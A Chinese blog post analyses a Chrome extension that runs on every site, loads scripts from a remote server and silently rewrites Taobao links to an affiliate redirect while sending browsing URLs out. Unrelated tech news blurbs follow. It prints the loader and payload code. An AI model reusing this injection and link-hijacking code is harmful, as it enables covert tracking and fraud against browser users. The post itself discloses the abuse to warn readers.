Google Chrome浏览器应该早就是大家的默认了,就连我这个Firefox的忠实用户(至少7年),前不久也换到Chrome了。Chrome本身非常安全 ,但是很早就有网站报道Chrome扩展很容易在用户浏览的任意网站注入js,收集用户行为;替换链接进行盈利;甚至盗取用户账户信息。
今天从Chrome Web Store官方下载安装了几个扩展后,亲身体验到这一恶意行为。经过是这样的:
我装好Google出品的Page Speed之后,分析了一下我的个人博客。在它给出的建议里:"压缩 JavaScript"这一项居然有以下提示:
压缩以下 JavaScript 资源可腾出的空间大小为 274B(即缩减 100%)。
压缩 http://xxx.xxx.com/js/xxx/extension.js 可腾出的空间大小为 274B(即缩减 100%)。
显然,这个js不是我主动加入的。排除了服务器代码被篡改、传输过程中被篡改(我这种小流量个人博客,再黑心的运营商也不屑于篡改吧)两种可能之后,很快将目标锁定在 新安装的几个Chrome扩展上。
输入chrome://extensions/查看已安装的扩展,找到有嫌疑的扩展,记下ID。打开Chrome存放扩展的目录(不同系统在不同目录,可以网上搜下, 或者用Everything找),Mac OS的在:~/Library/Application Support/Google/Chrome/Default/E xtensions。找到与之前记下的ID相匹配的目录进去。首先扫一眼扩展根目录的manifest.json。果然,目标暴露了:
"content_scripts": [ {
"js": [ "js/inject.js" ],
"matches": [ "http://*/*" ],
"run_at": "document_idle"
} ]
content scrpits是在页面内运行的JavaScript脚本,通过使用标准的DOM,可以获取或修改用户浏览页面的详细信息。一般Chrome扩展通过content scripts用来增强特定网站功能,除少数对所有网站都有用的扩展(如迅雷私有链转换扩展)之外,matches项只需要包含特定网站即可。而我遇到的这个扩展,显 然不需要有在任何网站运行JS的权限。
看下inject.js的代码:
(function(){
function init(){
var s,head;
s=document.createElement("script");
s.type="text/javascript";
s.charset="utf-8";
s.src="http://xxx.xxx.com/js/xxx/extension.js";
head = document.getElementsByTagName('head')[0];
head.appendChild(s);
}
init();
})();
这段代码又引入了作者服务器上的一个js文件,也就是被Page Speed发现的那个文件。引入在线文件的好处是灵活可控,服务端可以随时更改策略。再看下这个文件的内容:
(function(){
var s,head;
s=document.createElement("script");
s.type="text/javascript";
s.charset="utf-8";
s.src="http://xxx.xxx.com/js/extension.min.js";
head = document.getElementsByTagName('head')[0];
head.appendChild(s);
})();
很囧的是这个js继续引入了另外一个js文件,好在没有更多了,这就是我们要找的。代码被压缩过,jsbeautifier下,真相大白(节选后的代码还是很长,默认 折叠,有兴趣的同学可以点开看):
SITE_PATTERN: {
"^(http|https)://www\.(taobao|tmall)\.com/": "tb",
"^(http|https)://*/*": "other"
}
//...
injectHtml: function (a, b) {
switch (b.site) {
case "tb":
A1eg300.linkConvert();
break;
default:
break
}
}
//...
linkConvertProbability: function () {
var a = 31;
var b = 10;
var c = new Date().getMilliseconds();
var d = c % a;
var e = A1eg300.util.getRandomNum(0, a - 1);
d = Math.round(d / b);
e = Math.round(e / b);
if (d == e) {
return true
} else {
return false
}
}
//...
linkConvertParams: function (a, b) {
var c = "api/linkparam/";
var d = {
"key": a,
"op": "get"
};
A1eg300.util.jsonp(c, d, b)
}
//...
linkConvert: function () {
var a = true;
if (a) {
var b = A1eg300.keys.userLinkConvert;
A1eg300.linkConvertParams(b, function (c) {
var d = c.result;
if ( !! d) {
var e = false;
if ( !! c[b]) {
A1eg300.params.isLinkConverted = true
};
if (!A1eg300.params.isLinkConverted) {
e = true
};
if (e) {
var f = c.redirectUrl;
A1eg300.$("a").each(function () {
var g = A1eg300.$(this);
var h = A1eg300.$(this).attr("href");
g.click(function () {
if (!A1eg300.params.isLinkConverted && "undefined" !== typeof h && "" !== h && null !== h) {
f += "?r=taobao&link=" + encodeURIComponent(h);
A1eg300.$(this).attr("href", f);
var i = true;
var j = 7 * 24 * 3600;
A1eg300.api.setCookie(b, i, j, function () {
A1eg300.params.isLinkConverted = true;
A1eg300.$(this).attr("href", h)
})
}
}).mouseover(function () {
var i = A1eg300.$(this).attr("href");
if (f === i) {
A1eg300.$(this).attr("href", h)
}
})
})
}
}
})
}
}
上面这段代码至少做了几件事:获取用户当前浏览的页面url并将其分类(tb|other);将url发送给服务器(linkConvertParams);根据服务 器返回的内容替换页面上的链接地址(linkConvert)。
本文只想谈谈Chrome扩展带来的安全隐患,并不想讨伐某个具体的扩展。该扩展的名称、代码暴露的网址我故意隐藏掉了。该作者的其他扩展也有类似的代码,扩展本身都 非常优秀:功能实用、界面美观、交互流畅,在Chrome商店都有5w左右的安装量。
一直不太认同Google宽松的审核制度。拿移动市场来说,几大市场只有Google Play可以在几个小时内上架新App。不负责任的审核,导致Android官 方市场经常出现恶意App,相信Chrome商店也有类似问题。Google一直都在推广自己的浏览器,一直在给大家灌输Chrome是最安全的浏览器的思想。我觉得 Google也应该承担起相应的责任,减少用户隐私被泄露的可能。至少,对普通用户而言,他们需要对有自己的隐私数据有知情权和选择权。虽然Chrome商店在不起眼 的地方写了类似于"Your data on all websites;Your tabs and browsing activity"的权限说明,但这对普通用户来说,作用非常有限。
现阶段,对于普通用户,推荐只安装知名扩展和官方开发的扩展。懂技术的同学可以通过"开发者工具"的"Network"和"Sources"两个tab来检查已安装的 扩展有没有异常的行为,自己改掉有问题的代码。Chrome扩展的优点是代码透明,改起来非常方便。
Chrome扩展开发者花费了大量的心血开发免费软件给用户使用,很难得,尝试从扩展中获利也无可厚非。但个人认为,这种完全不告知用户的情况下就收集数据,甚至修改 页面始终是不厚道的。本人也是一名开发者,深刻体会到在这个神奇的国度开发软件想要通过正当途径赚钱有多么不容易。直接收费不现实;放Google广告转化率太低;靠 捐助也几乎不可能。不过外界环境恶劣不应该成为作恶的借口,有些底限还是要守住的。
update@3.20晚:晚上到家一看,本文提到的扩展居然升级了。扩展关于页增加了一段说明文字,告知了扩展一些行为,虽然用词含糊不清,也算是有了进步。
京东创始人刘强东和其妻子章泽天最近成为了互联网舆论关注的焦点。有关他们“移民美国”和在美国购买豪宅的传言在互联网上广泛传播。然而,京东官方通过微博发言人发布的消息澄清了这些传言,称这些言论纯属虚假信息和蓄意捏造。
日前,据博主“@超能数码君老周”爆料,国内三大运营商中国移动、中国电信和中国联通预计将集体采购百万台规模的华为Mate60系列手机。
据报道,荷兰半导体设备公司ASML正看到美国对华遏制政策的负面影响。阿斯麦(ASML)CEO彼得·温宁克在一档电视节目中分享了他对中国大陆问题以及该公司面临的出口管制和保护主义的看法。彼得曾在多个场合表达了他对出口管制以及中荷经济关系的担忧。
今年早些时候,抖音悄然上线了一款名为“青桃”的 App,Slogan 为“看见你的热爱”,根据应用介绍可知,“青桃”是一个属于年轻人的兴趣知识视频平台,由抖音官方出品的中长视频关联版本,整体风格有些类似B站。
日前,威马汽车首席数据官梅松林转发了一份“世界各国地区拥车率排行榜”,同时,他发文表示:中国汽车普及率低于非洲国家尼日利亚,每百户家庭仅17户有车。意大利世界排名第一,每十户中九户有车。
近日,一项新的研究发现,维生素 C 和 E 等抗氧化剂会激活一种机制,刺激癌症肿瘤中新血管的生长,帮助它们生长和扩散。
据媒体援引消息人士报道,苹果公司正在测试使用3D打印技术来生产其智能手表的钢质底盘。消息传出后,3D系统一度大涨超10%,不过截至周三收盘,该股涨幅回落至2%以内。
9月2日,坐拥千万粉丝的网红主播“秀才”账号被封禁,在社交媒体平台上引发热议。平台相关负责人表示,“秀才”账号违反平台相关规定,已封禁。据知情人士透露,秀才近期被举报存在违法行为,这可能是他被封禁的部分原因。据悉,“秀才”年龄39岁,是安徽省亳州市蒙城县人,抖音网红,粉丝数量超1200万。他曾被称为“中老年...
9月3日消息,亚马逊的一些股东,包括持有该公司股票的一家养老基金,日前对亚马逊、其创始人贝索斯和其董事会提起诉讼,指控他们在为 Project Kuiper 卫星星座项目购买发射服务时“违反了信义义务”。
据消息,为推广自家应用,苹果现推出了一个名为“Apps by Apple”的网站,展示了苹果为旗下产品(如 iPhone、iPad、Apple Watch、Mac 和 Apple TV)开发的各种应用程序。
特斯拉本周在美国大幅下调Model S和X售价,引发了该公司一些最坚定支持者的不满。知名特斯拉多头、未来基金(Future Fund)管理合伙人加里·布莱克发帖称,降价是一种“短期麻醉剂”,会让潜在客户等待进一步降价。
据外媒9月2日报道,荷兰半导体设备制造商阿斯麦称,尽管荷兰政府颁布的半导体设备出口管制新规9月正式生效,但该公司已获得在2023年底以前向中国运送受限制芯片制造机器的许可。
近日,根据美国证券交易委员会的文件显示,苹果卫星服务提供商 Globalstar 近期向马斯克旗下的 SpaceX 支付 6400 万美元(约 4.65 亿元人民币)。用于在 2023-2025 年期间,发射卫星,进一步扩展苹果 iPhone 系列的 SOS 卫星服务。
据报道,马斯克旗下社交平台𝕏(推特)日前调整了隐私政策,允许 𝕏 使用用户发布的信息来训练其人工智能(AI)模型。新的隐私政策将于 9 月 29 日生效。新政策规定,𝕏可能会使用所收集到的平台信息和公开可用的信息,来帮助训练 𝕏 的机器学习或人工智能模型。
9月2日,荣耀CEO赵明在采访中谈及华为手机回归时表示,替老同事们高兴,觉得手机行业,由于华为的回归,让竞争充满了更多的可能性和更多的魅力,对行业来说也是件好事。
《自然》30日发表的一篇论文报道了一个名为Swift的人工智能(AI)系统,该系统驾驶无人机的能力可在真实世界中一对一冠军赛里战胜人类对手。
近日,非营利组织纽约真菌学会(NYMS)发出警告,表示亚马逊为代表的电商平台上,充斥着各种AI生成的蘑菇觅食科普书籍,其中存在诸多错误。
社交媒体平台𝕏(原推特)新隐私政策提到:“在您同意的情况下,我们可能出于安全、安保和身份识别目的收集和使用您的生物识别信息。”
2023年德国柏林消费电子展上,各大企业都带来了最新的理念和产品,而高端化、本土化的中国产品正在不断吸引欧洲等国际市场的目光。
罗永浩日前在直播中吐槽苹果即将推出的 iPhone 新品,具体内容为:“以我对我‘子公司’的了解,我认为 iPhone 15 跟 iPhone 14 不会有什么区别的,除了序(列)号变了,这个‘不要脸’的东西,这个‘臭厨子’。